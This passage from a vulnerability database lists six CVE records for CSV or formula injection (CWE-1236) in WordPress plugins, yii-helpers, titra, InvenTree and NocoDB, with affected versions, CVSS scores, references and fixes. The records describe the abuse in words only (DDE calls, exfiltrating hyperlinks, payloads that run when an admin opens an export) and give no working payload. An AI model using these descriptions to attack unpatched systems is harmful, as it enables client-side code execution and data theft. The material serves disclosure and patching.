CWE-1236
Improper Neutralization of Formula Elements in a CSV File
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
CVE-2022-1202 (GCVE-0-2022-1202)
Vulnerability from cvelistv5 – Published: 2022-06-13 12:41 – Updated: 2024-08-02 23:55
VLAI
Title
WP-CRM <= 1.2.1 - CSV Injection
Summary
The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/53c8190c-baef-48… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Unknown | WP-CRM – Customer Relations Management for WordPress |
Affected:
1.2.1 , ≤ 1.2.1
(custom)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:55:24.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WP-CRM \u2013 Customer Relations Management for WordPress",
"vendor": "Unknown",
"versions": [
{
"lessThanOrEqual": "1.2.1",
"status": "affected",
"version": "1.2.1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ankur Bakre"
}
],
"descriptions": [
{
"lang": "en",
"value": "The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-13T12:41:41.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "WP-CRM \u003c= 1.2.1 - CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-1202",
"STATE": "PUBLIC",
"TITLE": "WP-CRM \u003c= 1.2.1 - CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WP-CRM \u2013 Customer Relations Management for WordPress",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "1.2.1",
"version_value": "1.2.1"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Ankur Bakre"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability."
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-1202",
"datePublished": "2022-06-13T12:41:41.000Z",
"dateReserved": "2022-04-01T00:00:00.000Z",
"dateUpdated": "2024-08-02T23:55:24.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-1539 (GCVE-0-2022-1539)
Vulnerability from cvelistv5 – Published: 2022-07-25 12:46 – Updated: 2024-08-03 00:10
VLAI
Title
Exports and Reports < 0.9.2 - Contributor+ CSV Injection
Summary
The Exports and Reports WordPress plugin before 0.9.2 does not sanitize and validate data when generating the CSV to export, which could lead to a CSV injection, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/50f70927-9677-4b… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Unknown | Exports and Reports |
Affected:
0.9.2 , < 0.9.2
(custom)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:10:03.492Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Exports and Reports",
"vendor": "Unknown",
"versions": [
{
"lessThan": "0.9.2",
"status": "affected",
"version": "0.9.2",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "websafe2021"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Exports and Reports WordPress plugin before 0.9.2 does not sanitize and validate data when generating the CSV to export, which could lead to a CSV injection, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-25T12:46:03.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Exports and Reports \u003c 0.9.2 - Contributor+ CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-1539",
"STATE": "PUBLIC",
"TITLE": "Exports and Reports \u003c 0.9.2 - Contributor+ CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Exports and Reports",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "0.9.2",
"version_value": "0.9.2"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "websafe2021"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Exports and Reports WordPress plugin before 0.9.2 does not sanitize and validate data when generating the CSV to export, which could lead to a CSV injection, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks."
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-1539",
"datePublished": "2022-07-25T12:46:03.000Z",
"dateReserved": "2022-04-29T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:10:03.492Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-1544 (GCVE-0-2022-1544)
Vulnerability from cvelistv5 – Published: 2022-05-01 11:45 – Updated: 2024-08-03 00:10
VLAI
Title
Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers
Summary
Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.
Severity
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bd… | x_refsource_CONFIRM |
| https://github.com/luyadev/yii-helpers/commit/995… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| luyadev | luyadev/yii-helpers |
Affected:
unspecified , < 1.2.1
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:10:02.924Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "luyadev/yii-helpers",
"vendor": "luyadev",
"versions": [
{
"lessThan": "1.2.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-01T11:45:12.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
],
"source": {
"advisory": "fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"discovery": "EXTERNAL"
},
"title": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-1544",
"STATE": "PUBLIC",
"TITLE": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "luyadev/yii-helpers",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "1.2.1"
}
]
}
}
]
},
"vendor_name": "luyadev"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"name": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb",
"refsource": "MISC",
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
]
},
"source": {
"advisory": "fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-1544",
"datePublished": "2022-05-01T11:45:12.000Z",
"dateReserved": "2022-05-01T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:10:02.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2027 (GCVE-0-2022-2027)
Vulnerability from cvelistv5 – Published: 2022-06-08 08:35 – Updated: 2024-08-03 00:24
VLAI
Title
Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra
Summary
Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0.
Severity
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/kromitgmbh/titra/commit/e606b6… | x_refsource_MISC |
| https://huntr.dev/bounties/fb99c27c-7eaa-48db-be3… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| kromitgmbh | kromitgmbh/titra |
Affected:
unspecified , < 0.77.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:24:44.064Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kromitgmbh/titra",
"vendor": "kromitgmbh",
"versions": [
{
"lessThan": "0.77.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-08T08:35:23.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
],
"source": {
"advisory": "fb99c27c-7eaa-48db-be39-b804cb83871d",
"discovery": "EXTERNAL"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-2027",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "kromitgmbh/titra",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "0.77.0"
}
]
}
}
]
},
"vendor_name": "kromitgmbh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694",
"refsource": "MISC",
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"name": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
]
},
"source": {
"advisory": "fb99c27c-7eaa-48db-be39-b804cb83871d",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-2027",
"datePublished": "2022-06-08T08:35:23.000Z",
"dateReserved": "2022-06-08T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:24:44.064Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2112 (GCVE-0-2022-2112)
Vulnerability from cvelistv5 – Published: 2022-06-17 10:15 – Updated: 2024-08-03 00:24
VLAI
Title
Improper Neutralization of Formula Elements in a CSV File in inventree/inventree
Summary
Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2.
Severity
9 (Critical)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/inventree/inventree/commit/26b… | x_refsource_MISC |
| https://huntr.dev/bounties/e57c36e7-fa39-435f-944… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| inventree | inventree/inventree |
Affected:
unspecified , < 0.7.2
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:24:44.196Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "inventree/inventree",
"vendor": "inventree",
"versions": [
{
"lessThan": "0.7.2",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-17T10:15:16.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
],
"source": {
"advisory": "e57c36e7-fa39-435f-944a-3a52ee066f73",
"discovery": "EXTERNAL"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in inventree/inventree",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-2112",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in inventree/inventree"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "inventree/inventree",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "0.7.2"
}
]
}
}
]
},
"vendor_name": "inventree"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f",
"refsource": "MISC",
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"name": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
]
},
"source": {
"advisory": "e57c36e7-fa39-435f-944a-3a52ee066f73",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-2112",
"datePublished": "2022-06-17T10:15:16.000Z",
"dateReserved": "2022-06-17T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:24:44.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-22121 (GCVE-0-2022-22121)
Vulnerability from cvelistv5 – Published: 2022-01-10 15:25 – Updated: 2024-09-17 04:09
VLAI
Title
NocoDB - CSV Injection in User Management
Summary
In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.
Severity
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nocodb/nocodb/commit/079e3abe | x_refsource_MISC |
| https://www.whitesourcesoftware.com/vulnerability… | x_refsource_MISC |
Impacted products
Date Public
2022-01-09 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:07:48.312Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "nocodb",
"vendor": "nocodb",
"versions": [
{
"lessThan": "unspecified",
"status": "affected",
"version": "0.81.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "0.83.8",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "WhiteSource Vulnerability Research Team (WVR)"
}
],
"datePublic": "2022-01-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-01-10T15:25:28.000Z",
"orgId": "478c68dd-22c1-4a41-97cd-654224dfacff",
"shortName": "Mend"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
],
"solutions": [
{
"lang": "en",
"value": "Update to version 0.84.0 or later"
}
],
"source": {
"advisory": "https://www.whitesourcesoftware.com/vulnerability-database/",
"discovery": "UNKNOWN"
},
"title": "NocoDB - CSV Injection in User Management",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vulnerabilitylab@whitesourcesoftware.com",
"DATE_PUBLIC": "2022-01-09T13:33:00.000Z",
"ID": "CVE-2022-22121",
"STATE": "PUBLIC",
"TITLE": "NocoDB - CSV Injection in User Management"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "nocodb",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_value": "0.81.0"
},
{
"version_affected": "\u003c=",
"version_value": "0.83.8"
}
]
}
}
]
},
"vendor_name": "nocodb"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "WhiteSource Vulnerability Research Team (WVR)"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/nocodb/nocodb/commit/079e3abe",
"refsource": "MISC",
